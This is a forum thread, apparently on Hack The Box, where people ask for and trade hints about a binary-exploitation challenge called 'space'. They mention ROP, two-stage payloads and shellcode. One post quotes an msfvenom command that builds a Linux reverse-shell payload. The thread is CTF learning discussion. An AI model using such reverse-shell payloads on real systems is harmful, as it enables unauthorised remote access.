Hi everybody! I managed to solve the challenge in the intended way, at least I think it is. Could somebody PM me to discuss the solution or other alternative ones?
Please PM with help for reverse shell. I have something working locally. I think I solved the ‘space’ issue, but then I’ve tried adding on a payload like msfvenom -p linux/x86/shell_reverse_tcp -f raw -b '\x00\x0a\x20' LHOST=MYIP LPORT=MYPORT -o msfpayload’ and it works locally but not remotely. I’ve tried making sure my firewall is open.
if anyone manage to solve it using ROP, please let me know (:
I have solved it with a two stage payload.
Could I DM someone about this challenge? I’ve been working it for awhile, and I think I need a nudge.
167.71.143.20:30766
i can’t connect to this host instance. can someone help me??
@1z3n said:
167.71.143.20:30766
i can’t connect to this host instance. can someone help me??
Possibly - although raising a jira ticket is probably the best course if it is an issue with HTB.
How are you trying to connect?
What error messages are you getting?
Without knowing the problem, it is very hard to help.
Ah finally got it (without ROP)… took me time to find a good shellcode, so many don’t work. I learnt a lot. Not easy at all for beginners!
Could I DM someone about this challenge? I have shellcode being executed but no shell.
Hi, could I get a nudge on the direction to go with this, please? I have the following ideas, but no go, 'cos the libc binary used on the server is not provided for download:
- ROP to execve function
- libc binary not provided and execve not imported by the space binary
- ROP to syscall
- binary does not contain executable byte sequences for syscall (0x0F 0x05), sysenter 0x0F 0x34) or int 0x80 (0xCD 0x80)
Type your comment> @hacked11 said:
Hi, could I get a nudge on the direction to go with this, please? I have the following ideas, but no go, 'cos the libc binary used on the server is not provided for download:
- ROP to execve function
- libc binary not provided and execve not imported by the space binary
- ROP to syscall
- binary does not contain executable byte sequences for syscall (0x0F 0x05), sysenter 0x0F 0x34) or int 0x80 (0xCD 0x80)
ok, got it… turns out I was overthinking and the binary is less hardened than I had assumed it to be…
Hi! Solved with ROP, can anyone PM me the intended way please?
It was not easy at all for me
I’ve just finished this machine with a little help but there’s a part I don’t really understand and my helper couldn’t explain it. Can I pm someone to check my solution?
Type your comment> @dosxuz said:
Can anyone please point me in the right direction? I am having problem in getting a leak.
This might help a bit.
Hi,
First time writing here on the Forum. I’d like to ask for a little sanity check, since I’m pretty new to this kind of challenge. Long story short, i’ve crafted \bin\sh payload without using ROP (don’t know how it works yet). The payload works fine on my machine (either in Radare and outside it) but it’s faulty on the remote server. I recognize that on my machine I can control many things (the env, for once) that I cannot control on the remote server, thus I’d like to ask… am I using the correct approach or should I use a different one (one that probably I’m unaware of)? Any insight is welcome.
Thanks
DM me on discord, I might be able to help you kavigihan#8518
Great challenge for learning the skills!